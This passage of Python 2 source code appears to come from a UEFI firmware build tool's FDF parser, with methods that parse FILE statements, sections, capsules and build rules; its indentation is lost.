if SectionType in ('TE', 'PE32'):
return True
else:
return False
## __GetFilePart() method
#
# Get components for FILE statement
#
# @param self The object pointer
# @param FfsFileObj for whom component is got
# @param MacroDict dictionary used to replace macro
#
def __GetFilePart(self, FfsFileObj, MacroDict = {}):
self.__GetFileOpts( FfsFileObj)
if not self.__IsToken("{"):
# if self.__IsKeyword('RELOCS_STRIPPED') or self.__IsKeyword('RELOCS_RETAINED'):
# if self.__FileCouldHaveRelocFlag(FfsFileObj.FvFileType):
# if self.__Token == 'RELOCS_STRIPPED':
# FfsFileObj.KeepReloc = False
# else:
# FfsFileObj.KeepReloc = True
# else:
# raise Warning("File type %s could not have reloc strip flag At Line %d" % (FfsFileObj.FvFileType, self.CurrentLineNumber), self.FileName, self.CurrentLineNumber)
#
# if not self.__IsToken("{"):
raise Warning("expected '{' At Line ", self.FileName, self.CurrentLineNumber)
if not self.__GetNextToken():
raise Warning("expected File name or section data At Line ", self.FileName, self.CurrentLineNumber)
if self.__Token == "FV":
if not self.__IsToken( "="):
raise Warning("expected '=' At Line ", self.FileName, self.CurrentLineNumber)
if not self.__GetNextToken():
raise Warning("expected FV name At Line ", self.FileName, self.CurrentLineNumber)
FfsFileObj.FvName = self.__Token
elif self.__Token == "FD":
if not self.__IsToken( "="):
raise Warning("expected '=' At Line ", self.FileName, self.CurrentLineNumber)
if not self.__GetNextToken():
raise Warning("expected FD name At Line ", self.FileName, self.CurrentLineNumber)
FfsFileObj.FdName = self.__Token
elif self.__Token in ("DEFINE", "APRIORI", "SECTION"):
self.__UndoToken()
self.__GetSectionData( FfsFileObj, MacroDict)
else:
FfsFileObj.FileName = self.__Token
if not self.__IsToken( "}"):
raise Warning("expected '}' At Line ", self.FileName, self.CurrentLineNumber)
## __GetFileOpts() method
#
# Get options for FILE statement
#
# @param self The object pointer
# @param FfsFileObj for whom options is got
#
def __GetFileOpts(self, FfsFileObj):
if self.__GetNextToken():
Pattern = re.compile(r'([a-zA-Z0-9\-]+|\$\(TARGET\)|\*)_([a-zA-Z0-9\-]+|\$\(TOOL_CHAIN_TAG\)|\*)_([a-zA-Z0-9\-]+|\$\(ARCH\)|\*)')
if Pattern.match(self.__Token):
FfsFileObj.KeyStringList.append(self.__Token)
if self.__IsToken(","):
while self.__GetNextToken():
if not Pattern.match(self.__Token):
raise Warning("expected KeyString \"Target_Tag_Arch\" At Line ", self.FileName, self.CurrentLineNumber)
FfsFileObj.KeyStringList.append(self.__Token)
if not self.__IsToken(","):
break
else:
self.__UndoToken()
if self.__IsKeyword( "FIXED", True):
FfsFileObj.Fixed = True
if self.__IsKeyword( "CHECKSUM", True):
FfsFileObj.CheckSum = True
if self.__GetAlignment():
FfsFileObj.Alignment = self.__Token
## __GetAlignment() method
#
# Return the alignment value
#
# @param self The object pointer
# @retval True Successfully find alignment
# @retval False Not able to find alignment
#
def __GetAlignment(self):
if self.__IsKeyword( "Align", True):
if not self.__IsToken( "="):
raise Warning("expected '=' At Line ", self.FileName, self.CurrentLineNumber)
if not self.__GetNextToken():
raise Warning("expected alignment value At Line ", self.FileName, self.CurrentLineNumber)
return True
return False
## __GetFilePart() method
#
# Get section data for FILE statement
#
# @param self The object pointer
# @param FfsFileObj for whom section is got
# @param MacroDict dictionary used to replace macro
#
def __GetSectionData(self, FfsFileObj, MacroDict = {}):
Dict = {}
Dict.update(MacroDict)
self.__GetDefineStatements(FfsFileObj)
Dict.update(FfsFileObj.DefineVarDict)
self.__GetAprioriSection(FfsFileObj, Dict.copy())
self.__GetAprioriSection(FfsFileObj, Dict.copy())
while True:
IsLeafSection = self.__GetLeafSection(FfsFileObj, Dict)
IsEncapSection = self.__GetEncapsulationSec(FfsFileObj)
if not IsLeafSection and not IsEncapSection:
break
## __GetLeafSection() method
#
# Get leaf section for Obj
#
# @param self The object pointer
# @param Obj for whom leaf section is got
# @param MacroDict dictionary used to replace macro
# @retval True Successfully find section statement
# @retval False Not able to find section statement
#
def __GetLeafSection(self, Obj, MacroDict = {}):
OldPos = self.GetFileBufferPos()
if not self.__IsKeyword( "SECTION"):
if len(Obj.SectionList) == 0:
raise Warning("expected SECTION At Line ", self.FileName, self.CurrentLineNumber)
else:
return False
AlignValue = None
if self.__GetAlignment():
if self.__Token not in ("Auto", "8", "16", "32", "64", "128", "512", "1K", "4K", "32K" ,"64K"):
raise Warning("Incorrect alignment '%s'" % self.__Token, self.FileName, self.CurrentLineNumber)
AlignValue = self.__Token
BuildNum = None
if self.__IsKeyword( "BUILD_NUM"):
if not self.__IsToken( "="):
raise Warning("expected '=' At Line ", self.FileName, self.CurrentLineNumber)
if not self.__GetNextToken():
raise Warning("expected Build number value At Line ", self.FileName, self.CurrentLineNumber)
BuildNum = self.__Token
if self.__IsKeyword( "VERSION"):
if AlignValue == 'Auto':
raise Warning("Auto alignment can only be used in PE32 or TE section ", self.FileName, self.CurrentLineNumber)
if not self.__IsToken( "="):
raise Warning("expected '=' At Line ", self.FileName, self.CurrentLineNumber)
if not self.__GetNextToken():
raise Warning("expected version At Line ", self.FileName, self.CurrentLineNumber)
VerSectionObj = CommonDataClass.FdfClass.VerSectionClassObject()
VerSectionObj.Alignment = AlignValue
VerSectionObj.BuildNum = BuildNum
if self.__GetStringData():
VerSectionObj.StringData = self.__Token
else:
VerSectionObj.FileName = self.__Token
Obj.SectionList.append(VerSectionObj)
elif self.__IsKeyword( "UI"):
if AlignValue == 'Auto':
raise Warning("Auto alignment can only be used in PE32 or TE section ", self.FileName, self.CurrentLineNumber)
if not self.__IsToken( "="):
raise Warning("expected '=' At Line ", self.FileName, self.CurrentLineNumber)
if not self.__GetNextToken():
raise Warning("expected UI At Line ", self.FileName, self.CurrentLineNumber)
UiSectionObj = CommonDataClass.FdfClass.UiSectionClassObject()
UiSectionObj.Alignment = AlignValue
if self.__GetStringData():
UiSectionObj.StringData = self.__Token
else:
UiSectionObj.FileName = self.__Token
Obj.SectionList.append(UiSectionObj)
elif self.__IsKeyword( "FV_IMAGE"):
if AlignValue == 'Auto':
raise Warning("Auto alignment can only be used in PE32 or TE section ", self.FileName, self.CurrentLineNumber)
if not self.__IsToken( "="):
raise Warning("expected '=' At Line ", self.FileName, self.CurrentLineNumber)
if not self.__GetNextWord():
raise Warning("expected FV name At Line ", self.FileName, self.CurrentLineNumber)
FvName = self.__Token.upper()
FvObj = None
if self.__IsToken( "{"):
FvObj = Fv.FV()
FvObj.UiFvName = FvName
self.__GetDefineStatements(FvObj)
MacroDict.update(FvObj.DefineVarDict)
self.__GetBlockStatement(FvObj)
self.__GetSetStatements(FvObj)
self.__GetFvAlignment(FvObj)
self.__GetFvAttributes(FvObj)
self.__GetAprioriSection(FvObj, MacroDict.copy())
self.__GetAprioriSection(FvObj, MacroDict.copy())
while True:
IsInf = self.__GetInfStatement(FvObj, MacroDict.copy())
IsFile = self.__GetFileStatement(FvObj, MacroDict.copy())
if not IsInf and not IsFile:
break
if not self.__IsToken( "}"):
raise Warning("expected '}' At Line ", self.FileName, self.CurrentLineNumber)
FvImageSectionObj = CommonDataClass.FdfClass.FvImageSectionClassObject()
FvImageSectionObj.Alignment = AlignValue
if FvObj != None:
FvImageSectionObj.Fv = FvObj
FvImageSectionObj.FvName = None
else:
FvImageSectionObj.FvName = FvName
Obj.SectionList.append(FvImageSectionObj)
elif self.__IsKeyword("PEI_DEPEX_EXP") or self.__IsKeyword("DXE_DEPEX_EXP") or self.__IsKeyword("SMM_DEPEX_EXP"):
if AlignValue == 'Auto':
raise Warning("Auto alignment can only be used in PE32 or TE section ", self.FileName, self.CurrentLineNumber)
DepexSectionObj = CommonDataClass.FdfClass.DepexSectionClassObject()
DepexSectionObj.Alignment = AlignValue
DepexSectionObj.DepexType = self.__Token
if not self.__IsToken( "="):
raise Warning("expected '=' At Line ", self.FileName, self.CurrentLineNumber)
if not self.__IsToken( "{"):
raise Warning("expected '{' At Line ", self.FileName, self.CurrentLineNumber)
if not self.__SkipToToken( "}"):
raise Warning("expected Depex expression ending '}' At Line ", self.FileName, self.CurrentLineNumber)
DepexSectionObj.Expression = self.__SkippedChars.rstrip('}')
Obj.SectionList.append(DepexSectionObj)
else:
if not self.__GetNextWord():
raise Warning("expected section type At Line ", self.FileName, self.CurrentLineNumber)
# Encapsulation section appear, UndoToken and return
if self.__Token == "COMPRESS" or self.__Token == "GUIDED":
self.SetFileBufferPos(OldPos)
return False
if self.__Token not in ("COMPAT16", "PE32", "PIC", "TE", "FV_IMAGE", "RAW", "DXE_DEPEX",\
"UI", "VERSION", "PEI_DEPEX", "SUBTYPE_GUID", "SMM_DEPEX"):
raise Warning("Unknown section type '%s'" % self.__Token, self.FileName, self.CurrentLineNumber)
if AlignValue == 'Auto'and (not self.__Token == 'PE32') and (not self.__Token == 'TE'):
raise Warning("Auto alignment can only be used in PE32 or TE section ", self.FileName, self.CurrentLineNumber)
# DataSection
DataSectionObj = CommonDataClass.FdfClass.DataSectionClassObject()
DataSectionObj.Alignment = AlignValue
DataSectionObj.SecType = self.__Token
if self.__IsKeyword('RELOCS_STRIPPED') or self.__IsKeyword('RELOCS_RETAINED'):
if self.__FileCouldHaveRelocFlag(Obj.FvFileType) and self.__SectionCouldHaveRelocFlag(DataSectionObj.SecType):
if self.__Token == 'RELOCS_STRIPPED':
DataSectionObj.KeepReloc = False
else:
DataSectionObj.KeepReloc = True
else:
raise Warning("File type %s, section type %s, could not have reloc strip flag At Line %d" % (Obj.FvFileType, DataSectionObj.SecType, self.CurrentLineNumber), self.FileName, self.CurrentLineNumber)
if self.__IsToken("="):
if not self.__GetNextToken():
raise Warning("expected section file path At Line ", self.FileName, self.CurrentLineNumber)
DataSectionObj.SectFileName = self.__Token
else:
if not self.__GetCglSection(DataSectionObj):
return False
Obj.SectionList.append(DataSectionObj)
return True
## __GetCglSection() method
#
# Get compressed or GUIDed section for Obj
#
# @param self The object pointer
# @param Obj for whom leaf section is got
# @param AlignValue alignment value for complex section
# @retval True Successfully find section statement
# @retval False Not able to find section statement
#
def __GetCglSection(self, Obj, AlignValue = None):
if self.__IsKeyword( "COMPRESS"):
type = "PI_STD"
if self.__IsKeyword("PI_STD") or self.__IsKeyword("PI_NONE"):
type = self.__Token
if not self.__IsToken("{"):
raise Warning("expected '{' At Line ", self.FileName, self.CurrentLineNumber)
CompressSectionObj = CommonDataClass.FdfClass.CompressSectionClassObject()
CompressSectionObj.Alignment = AlignValue
CompressSectionObj.CompType = type
# Recursive sections...
while True:
IsLeafSection = self.__GetLeafSection(CompressSectionObj)
IsEncapSection = self.__GetEncapsulationSec(CompressSectionObj)
if not IsLeafSection and not IsEncapSection:
break
if not self.__IsToken( "}"):
raise Warning("expected '}' At Line ", self.FileName, self.CurrentLineNumber)
Obj.SectionList.append(CompressSectionObj)
# else:
# raise Warning("Compress type not known At Line ")
return True
elif self.__IsKeyword( "GUIDED"):
GuidValue = None
if self.__GetNextGuid():
GuidValue = self.__Token
AttribDict = self.__GetGuidAttrib()
if not self.__IsToken("{"):
raise Warning("expected '{' At Line ", self.FileName, self.CurrentLineNumber)
GuidSectionObj = CommonDataClass.FdfClass.GuidSectionClassObject()
GuidSectionObj.Alignment = AlignValue
GuidSectionObj.NameGuid = GuidValue
GuidSectionObj.SectionType = "GUIDED"
GuidSectionObj.ProcessRequired = AttribDict["PROCESSING_REQUIRED"]
GuidSectionObj.AuthStatusValid = AttribDict["AUTH_STATUS_VALID"]
# Recursive sections...
while True:
IsLeafSection = self.__GetLeafSection(GuidSectionObj)
IsEncapSection = self.__GetEncapsulationSec(GuidSectionObj)
if not IsLeafSection and not IsEncapSection:
break
if not self.__IsToken( "}"):
raise Warning("expected '}' At Line ", self.FileName, self.CurrentLineNumber)
Obj.SectionList.append(GuidSectionObj)
return True
return False
## __GetGuidAttri() method
#
# Get attributes for GUID section
#
# @param self The object pointer
# @retval AttribDict Dictionary of key-value pair of section attributes
#
def __GetGuidAttrib(self):
AttribDict = {}
AttribDict["PROCESSING_REQUIRED"] = False
AttribDict["AUTH_STATUS_VALID"] = False
if self.__IsKeyword("PROCESSING_REQUIRED") or self.__IsKeyword("AUTH_STATUS_VALID"):
AttribKey = self.__Token
if not self.__IsToken("="):
raise Warning("expected '=' At Line ", self.FileName, self.CurrentLineNumber)
if not self.__GetNextToken() or self.__Token.upper() not in ("TRUE", "FALSE", "1", "0"):
raise Warning("expected TRUE/FALSE (1/0) At Line ", self.FileName, self.CurrentLineNumber)
AttribDict[AttribKey] = self.__Token
if self.__IsKeyword("PROCESSING_REQUIRED") or self.__IsKeyword("AUTH_STATUS_VALID"):
AttribKey = self.__Token
if not self.__IsToken("="):
raise Warning("expected '=' At Line ")
if not self.__GetNextToken() or self.__Token.upper() not in ("TRUE", "FALSE", "1", "0"):
raise Warning("expected TRUE/FALSE (1/0) At Line ", self.FileName, self.CurrentLineNumber)
AttribDict[AttribKey] = self.__Token
return AttribDict
## __GetEncapsulationSec() method
#
# Get encapsulation section for FILE
#
# @param self The object pointer
# @param FfsFile for whom section is got
# @retval True Successfully find section statement
# @retval False Not able to find section statement
#
def __GetEncapsulationSec(self, FfsFileObj):
OldPos = self.GetFileBufferPos()
if not self.__IsKeyword( "SECTION"):
if len(FfsFileObj.SectionList) == 0:
raise Warning("expected SECTION At Line ", self.FileName, self.CurrentLineNumber)
else:
return False
AlignValue = None
if self.__GetAlignment():
if self.__Token not in ("8", "16", "32", "64", "128", "512", "1K", "4K", "32K" ,"64K"):
raise Warning("Incorrect alignment '%s'" % self.__Token, self.FileName, self.CurrentLineNumber)
AlignValue = self.__Token
if not self.__GetCglSection(FfsFileObj, AlignValue):
self.SetFileBufferPos(OldPos)
return False
else:
return True
## __GetCapsule() method
#
# Get capsule section contents and store its data into capsule list of self.Profile
#
# @param self The object pointer
# @retval True Successfully find a capsule
# @retval False Not able to find a capsule
#
def __GetCapsule(self):
if not self.__GetNextToken():
return False
S = self.__Token.upper()
if S.startswith("[") and not S.startswith("[CAPSULE."):
if not S.startswith("[VTF.") and not S.startswith("[RULE.") and not S.startswith("[OPTIONROM."):
raise Warning("Unknown section or section appear sequence error (The correct sequence should be [FD.], [FV.], [Capsule.], [VTF.], [Rule.], [OptionRom.])", self.FileName, self.CurrentLineNumber)
self.__UndoToken()
return False
self.__UndoToken()
if not self.__IsToken("[CAPSULE.", True):
FileLineTuple = GetRealFileLine(self.FileName, self.CurrentLineNumber)
print 'Parsing String: %s in File %s, At line: %d, Offset Within Line: %d' \
% (self.Profile.FileLinesList[self.CurrentLineNumber - 1][self.CurrentOffsetWithinLine :], FileLineTuple[0], FileLineTuple[1], self.CurrentOffsetWithinLine)
raise Warning("expected [Capsule.] At Line ", self.FileName, self.CurrentLineNumber)
CapsuleObj = CommonDataClass.FdfClass.CapsuleClassObject()
CapsuleName = self.__GetUiName()
if not CapsuleName:
raise Warning("expected capsule name At line ", self.FileName, self.CurrentLineNumber)
CapsuleObj.UiCapsuleName = CapsuleName.upper()
if not self.__IsToken( "]"):
raise Warning("expected ']' At Line ", self.FileName, self.CurrentLineNumber)
if self.__IsKeyword("CREATE_FILE"):
if not self.__IsToken( "="):
raise Warning("expected '=' At Line ", self.FileName, self.CurrentLineNumber)
if not self.__GetNextToken():
raise Warning("expected file name At Line ", self.FileName, self.CurrentLineNumber)
CapsuleObj.CreateFile = self.__Token
self.__GetCapsuleStatements(CapsuleObj)
self.Profile.CapsuleList.append(CapsuleObj)
return True
## __GetCapsuleStatements() method
#
# Get statements for capsule
#
# @param self The object pointer
# @param Obj for whom statements are got
#
def __GetCapsuleStatements(self, Obj):
self.__GetCapsuleTokens(Obj)
self.__GetDefineStatements(Obj)
self.__GetSetStatements(Obj)
self.__GetCapsuleData(Obj)
## __GetCapsuleStatements() method
#
# Get token statements for capsule
#
# @param self The object pointer
# @param Obj for whom token statements are got
#
def __GetCapsuleTokens(self, Obj):
if not self.__IsKeyword("CAPSULE_GUID"):
raise Warning("expected 'CAPSULE_GUID' At Line ", self.FileName, self.CurrentLineNumber)
while self.__CurrentLine().find("=") != -1:
NameValue = self.__CurrentLine().split("=")
Obj.TokensDict[NameValue[0].strip()] = NameValue[1].strip()
self.CurrentLineNumber += 1
self.CurrentOffsetWithinLine = 0
## __GetCapsuleData() method
#
# Get capsule data for capsule
#
# @param self The object pointer
# @param Obj for whom capsule data are got
#
def __GetCapsuleData(self, Obj):
while True:
IsInf = self.__GetInfStatement(Obj, True)
IsFile = self.__GetFileStatement(Obj, True)
IsFv = self.__GetFvStatement(Obj)
if not IsInf and not IsFile and not IsFv:
break
## __GetFvStatement() method
#
# Get FV for capsule
#
# @param self The object pointer
# @param CapsuleObj for whom FV is got
# @retval True Successfully find a FV statement
# @retval False Not able to find a FV statement
#
def __GetFvStatement(self, CapsuleObj):
if not self.__IsKeyword("FV"):
return False
if not self.__IsToken("="):
raise Warning("expected '=' At Line ", self.FileName, self.CurrentLineNumber)
if not self.__GetNextToken():
raise Warning("expected FV name At Line ", self.FileName, self.CurrentLineNumber)
# CapsuleFv = CapsuleData.CapsuleFv()
# CapsuleFv.FvName = self.__Token
# CapsuleObj.CapsuleDataList.append(CapsuleFv)
return True
## __GetRule() method
#
# Get Rule section contents and store its data into rule list of self.Profile
#
# @param self The object pointer
# @retval True Successfully find a Rule
# @retval False Not able to find a Rule
#
def __GetRule(self):
if not self.__GetNextToken():
return False
S = self.__Token.upper()
if S.startswith("[") and not S.startswith("[RULE."):
if not S.startswith("[OPTIONROM."):
raise Warning("Unknown section or section appear sequence error (The correct sequence should be [FD.], [FV.], [Capsule.], [VTF.], [Rule.], [OptionRom.])", self.FileName, self.CurrentLineNumber)
self.__UndoToken()
return False
self.__UndoToken()
if not self.__IsToken("[Rule.", True):
FileLineTuple = GetRealFileLine(self.FileName, self.CurrentLineNumber)
print 'Parsing String: %s in File %s, At line: %d, Offset Within Line: %d' \
% (self.Profile.FileLinesList[self.CurrentLineNumber - 1][self.CurrentOffsetWithinLine :], FileLineTuple[0], FileLineTuple[1], self.CurrentOffsetWithinLine)
raise Warning("expected [Rule.] At Line ", self.FileName, self.CurrentLineNumber)
if not self.__SkipToToken("."):
raise Warning("expected '.' At Line ", self.FileName, self.CurrentLineNumber)
Arch = self.__SkippedChars.rstrip(".")
if Arch.upper() not in ("IA32", "X64", "IPF", "EBC", "ARM", "AARCH64", "COMMON"):
raise Warning("Unknown Arch '%s'" % Arch, self.FileName, self.CurrentLineNumber)
ModuleType = self.__GetModuleType()
TemplateName = ""
if self.__IsToken("."):
if not self.__GetNextWord():
raise Warning("expected template name At Line ", self.FileName, self.CurrentLineNumber)
TemplateName = self.__Token
if not self.__IsToken( "]"):
raise Warning("expected ']' At Line ", self.FileName, self.CurrentLineNumber)
RuleObj = self.__GetRuleFileStatements()
RuleObj.Arch = Arch.upper()
RuleObj.ModuleType = ModuleType
RuleObj.TemplateName = TemplateName
if TemplateName == '' :
self.Profile.RuleDict['RULE' + \
'.' + \
Arch.upper() + \
'.' + \
ModuleType.upper() ] = RuleObj
else :
self.Profile.RuleDict['RULE' + \
'.' + \
Arch.upper() + \
'.' + \
ModuleType.upper() + \
'.' + \
TemplateName.upper() ] = RuleObj
# self.Profile.RuleList.append(rule)
return True
## __GetModuleType() method
#
# Return the module type
#
# @param self The object pointer
# @retval string module type
#
def __GetModuleType(self):
if not self.__GetNextWord():
raise Warning("expected Module type At Line ", self.FileName, self.CurrentLineNumber)
if self.__Token.upper() not in ("SEC", "PEI_CORE", "PEIM", "DXE_CORE", \
"DXE_DRIVER", "DXE_SAL_DRIVER", \
"DXE_SMM_DRIVER", "DXE_RUNTIME_DRIVER", \
"UEFI_DRIVER", "UEFI_APPLICATION", "USER_DEFINED", "DEFAULT", "BASE", \
"SECURITY_CORE", "COMBINED_PEIM_DRIVER", "PIC_PEIM", "RELOCATABLE_PEIM", \
"PE32_PEIM", "BS_DRIVER", "RT_DRIVER", "SAL_RT_DRIVER", "APPLICATION", "ACPITABLE", "SMM_CORE"):
raise Warning("Unknown Module type At line ", self.FileName, self.CurrentLineNumber)
return self.__Token
## __GetFileExtension() method
#
# Return the file extension
#
# @param self The object pointer
# @retval string file name extension
#
def __GetFileExtension(self):
if not self.__IsToken("."):
raise Warning("expected '.' At Line ", self.FileName, self.CurrentLineNumber)
Ext = ""
if self.__GetNextToken():
Pattern = re.compile(r'([a-zA-Z][a-zA-Z0-9]*)')
if Pattern.match(self.__Token):
Ext = self.__Token
return '.' + Ext
else:
raise Warning("Unknown file extension At Line ", self.FileName, self.CurrentLineNumber)
else:
raise Warning("expected file extension At Line ", self.FileName, self.CurrentLineNumber)
## __GetRuleFileStatement() method
#
# Get rule contents
#
# @param self The object pointer
# @retval Rule Rule object
#
def __GetRuleFileStatements(self):
if not self.__IsKeyword("FILE"):
raise Warning("expected FILE At Line ", self.FileName, self.CurrentLineNumber)
if not self.__GetNextWord():
raise Warning("expected FFS type At Line ", self.FileName, self.CurrentLineNumber)
Type = self.__Token.strip().upper()
if Type not in ("RAW", "FREEFORM", "SEC", "PEI_CORE", "PEIM",\
"PEI_DXE_COMBO", "DRIVER", "DXE_CORE", "APPLICATION", "FV_IMAGE", "SMM", "SMM_CORE"):
raise Warning("Unknown FV type At line ", self.FileName, self.CurrentLineNumber)
if not self.__IsToken("="):
raise Warning("expected '=' At Line ", self.FileName, self.CurrentLineNumber)
if not self.__IsKeyword("$(NAMED_GUID)"):
if not self.__GetNextWord():
raise Warning("expected $(NAMED_GUID)", self.FileName, self.CurrentLineNumber)
if self.__Token == 'PCD':
if not self.__IsToken( "("):
raise Warning("expected '('", self.FileName, self.CurrentLineNumber)
PcdPair = self.__GetNextPcdName()
if not self.__IsToken( ")"):
raise Warning("expected ')'", self.FileName, self.CurrentLineNumber)
self.__Token = 'PCD('+PcdPair[1]+'.'+PcdPair[0]+')'
NameGuid = self.__Token
KeepReloc = None
if self.__IsKeyword('RELOCS_STRIPPED') or self.__IsKeyword('RELOCS_RETAINED'):
if self.__FileCouldHaveRelocFlag(Type):
if self.__Token == 'RELOCS_STRIPPED':
KeepReloc = False
else:
KeepReloc = True
else:
raise Warning("File type %s could not have reloc strip flag At Line %d" % (Type, self.CurrentLineNumber), self.FileName, self.CurrentLineNumber)
KeyStringList = []
if self.__GetNextToken():
Pattern = re.compile(r'([a-zA-Z0-9\-]+|\$\(TARGET\)|\*)_([a-zA-Z0-9\-]+|\$\(TOOL_CHAIN_TAG\)|\*)_([a-zA-Z0-9\-]+|\$\(ARCH\)|\*)')
if Pattern.match(self.__Token):
KeyStringList.append(self.__Token)
if self.__IsToken(","):
while self.__GetNextToken():
if not Pattern.match(self.__Token):
raise Warning("expected KeyString \"Target_Tag_Arch\" At Line ", self.FileName, self.CurrentLineNumber)
KeyStringList.append(self.__Token)
if not self.__IsToken(","):
break
else:
self.__UndoToken()
Fixed = False
if self.__IsKeyword("Fixed", True):
Fixed = True
CheckSum = False
if self.__IsKeyword("CheckSum", True):
CheckSum = True
AlignValue = ""
if self.__GetAlignment():
if self.__Token not in ("Auto", "8", "16", "32", "64", "128", "512", "1K", "4K", "32K" ,"64K"):
raise Warning("Incorrect alignment At Line ", self.FileName, self.CurrentLineNumber)
AlignValue = self.__Token
if self.__IsToken("{"):
# Complex file rule expected
Rule = RuleComplexFile.RuleComplexFile()
Rule.FvFileType = Type
Rule.NameGuid = NameGuid
Rule.Alignment = AlignValue
Rule.CheckSum = CheckSum
Rule.Fixed = Fixed
Rule.KeyStringList = KeyStringList
if KeepReloc != None:
Rule.KeepReloc = KeepReloc
while True:
IsEncapsulate = self.__GetRuleEncapsulationSection(Rule)
IsLeaf = self.__GetEfiSection(Rule)
if not IsEncapsulate and not IsLeaf:
break
if not self.__IsToken("}"):
raise Warning("expected '}' At Line ", self.FileName, self.CurrentLineNumber)
return Rule
elif self.__IsToken("|"):
# Ext rule expected
Ext = self.__GetFileExtension()
Rule = RuleSimpleFile.RuleSimpleFile()
Rule.FvFileType = Type
Rule.NameGuid = NameGuid
Rule.Alignment = AlignValue
Rule.CheckSum = CheckSum
Rule.Fixed = Fixed
Rule.FileExtension = Ext
Rule.KeyStringList = KeyStringList
if KeepReloc != None:
Rule.KeepReloc = KeepReloc
return Rule
else:
# Simple file rule expected
if not self.__GetNextWord():
raise Warning("expected leaf section type At Line ", self.FileName, self.CurrentLineNumber)
SectionName = self.__Token
if SectionName not in ("COMPAT16", "PE32", "PIC", "TE", "FV_IMAGE", "RAW", "DXE_DEPEX",\
"UI", "PEI_DEPEX", "VERSION", "SUBTYPE_GUID", "SMM_DEPEX"):
raise Warning("Unknown leaf section name '%s'" % SectionName, self.FileName, self.CurrentLineNumber)
if self.__IsKeyword("Fixed", True):
Fixed = True
if self.__IsKeyword("CheckSum", True):
CheckSum = True
if self.__GetAlignment():
if self.__Token not in ("Auto", "8", "16", "32", "64", "128", "512", "1K", "4K", "32K" ,"64K"):
raise Warning("Incorrect alignment At Line ", self.FileName, self.CurrentLineNumber)
if self.__Token == 'Auto' and (not SectionName == 'PE32') and (not SectionName == 'TE'):
raise Warning("Auto alignment can only be used in PE32 or TE section ", self.FileName, self.CurrentLineNumber)
AlignValue = self.__Token
if not self.__GetNextToken():
raise Warning("expected File name At Line ", self.FileName, self.CurrentLineNumber)
Rule = RuleSimpleFile.RuleSimpleFile()
Rule.SectionType = SectionName
Rule.FvFileType = Type
Rule.NameGuid = NameGuid
Rule.Alignment = AlignValue
Rule.CheckSum = CheckSum
Rule.Fixed = Fixed
Rule.FileName = self.__Token
Rule.KeyStringList = KeyStringList
if KeepReloc != None:
Rule.KeepReloc = KeepReloc
return Rule
## __GetEfiSection() method
#
# Get section list for Rule
#
# @param self The object pointer
# @param Obj for whom section is got
# @retval True Successfully find section statement
# @retval False Not able to find section statement
#
def __GetEfiSection(self, Obj):
OldPos = self.GetFileBufferPos()
if not self.__GetNextWord():
return False
SectionName = self.__Token
if SectionName not in ("COMPAT16", "PE32", "PIC", "TE", "FV_IMAGE", "RAW", "DXE_DEPEX",\
"UI", "VERSION", "PEI_DEPEX", "GUID", "SMM_DEPEX"):
self.__UndoToken()
return False
if SectionName == "FV_IMAGE":
FvImageSectionObj = FvImageSection.FvImageSection()
if self.__IsKeyword("FV_IMAGE"):
pass
if self.__IsToken( "{"):
FvObj = Fv.FV()
self.__GetDefineStatements(FvObj)
self.__GetBlockStatement(FvObj)
self.__GetSetStatements(FvObj)
self.__GetFvAlignment(FvObj)
self.__GetFvAttributes(FvObj)
self.__GetAprioriSection(FvObj)
self.__GetAprioriSection(FvObj)
while True:
IsInf = self.__GetInfStatement(FvObj)
IsFile = self.__GetFileStatement(FvObj)
if not IsInf and not IsFile:
break
if not self.__IsToken( "}"):
raise Warning("expected '}' At Line ", self.FileName, self.CurrentLineNumber)
FvImageSectionObj.Fv = FvObj
FvImageSectionObj.FvName = None
else:
if not self.__IsKeyword("FV"):
raise Warning("expected 'FV' At Line ", self.FileName, self.CurrentLineNumber)
FvImageSectionObj.FvFileType = self.__Token
if self.__GetAlignment():
if self.__Token not in ("8", "16", "32", "64", "128", "512", "1K", "4K", "32K" ,"64K"):
raise Warning("Incorrect alignment At Line ", self.FileName, self.CurrentLineNumber)
FvImageSectionObj.Alignment = self.__Token
if self.__IsToken('|'):
FvImageSectionObj.FvFileExtension = self.__GetFileExtension()
elif self.__GetNextToken():
if self.__Token not in ("}", "COMPAT16", "PE32", "PIC", "TE", "FV_IMAGE", "RAW", "DXE_DEPEX",\
"UI", "VERSION", "PEI_DEPEX", "GUID", "SMM_DEPEX"):
FvImageSectionObj.FvFileName = self.__Token
else:
self.__UndoToken()
else:
raise Warning("expected FV file name At Line ", self.FileName, self.CurrentLineNumber)
Obj.SectionList.append(FvImageSectionObj)
return True
EfiSectionObj = EfiSection.EfiSection()
EfiSectionObj.SectionType = SectionName
if not self.__GetNextToken():
raise Warning("expected file type At Line ", self.FileName, self.CurrentLineNumber)
if self.__Token == "STRING":
if not self.__RuleSectionCouldHaveString(EfiSectionObj.SectionType):
raise Warning("%s section could NOT have string data At Line %d" % (EfiSectionObj.SectionType, self.CurrentLineNumber), self.FileName, self.CurrentLineNumber)
if not self.__IsToken('='):
raise Warning("expected '=' At Line ", self.FileName, self.CurrentLineNumber)
if not self.__GetNextToken():
raise Warning("expected Quoted String At Line ", self.FileName, self.CurrentLineNumber)
if self.__GetStringData():
EfiSectionObj.StringData = self.__Token
if self.__IsKeyword("BUILD_NUM"):
if not self.__RuleSectionCouldHaveBuildNum(EfiSectionObj.SectionType):
raise Warning("%s section could NOT have BUILD_NUM At Line %d" % (EfiSectionObj.SectionType, self.CurrentLineNumber), self.FileName, self.CurrentLineNumber)
if not self.__IsToken("="):
raise Warning("expected '=' At Line ", self.FileName, self.CurrentLineNumber)
if not self.__GetNextToken():
raise Warning("expected Build number At Line ", self.FileName, self.CurrentLineNumber)
EfiSectionObj.BuildNum = self.__Token
else:
EfiSectionObj.FileType = self.__Token
self.__CheckRuleSectionFileType(EfiSectionObj.SectionType, EfiSectionObj.FileType)
if self.__IsKeyword("Optional"):
if not self.__RuleSectionCouldBeOptional(EfiSectionObj.SectionType):
raise Warning("%s section could NOT be optional At Line %d" % (EfiSectionObj.SectionType, self.CurrentLineNumber), self.FileName, self.CurrentLineNumber)
EfiSectionObj.Optional = True
if self.__IsKeyword("BUILD_NUM"):
if not self.__RuleSectionCouldHaveBuildNum(EfiSectionObj.SectionType):
raise Warning("%s section could NOT have BUILD_NUM At Line %d" % (EfiSectionObj.SectionType, self.CurrentLineNumber), self.FileName, self.CurrentLineNumber)
if not self.__IsToken("="):
raise Warning("expected '=' At Line ", self.FileName, self.CurrentLineNumber)
if not self.__GetNextToken():
raise Warning("expected Build number At Line ", self.FileName, self.CurrentLineNumber)
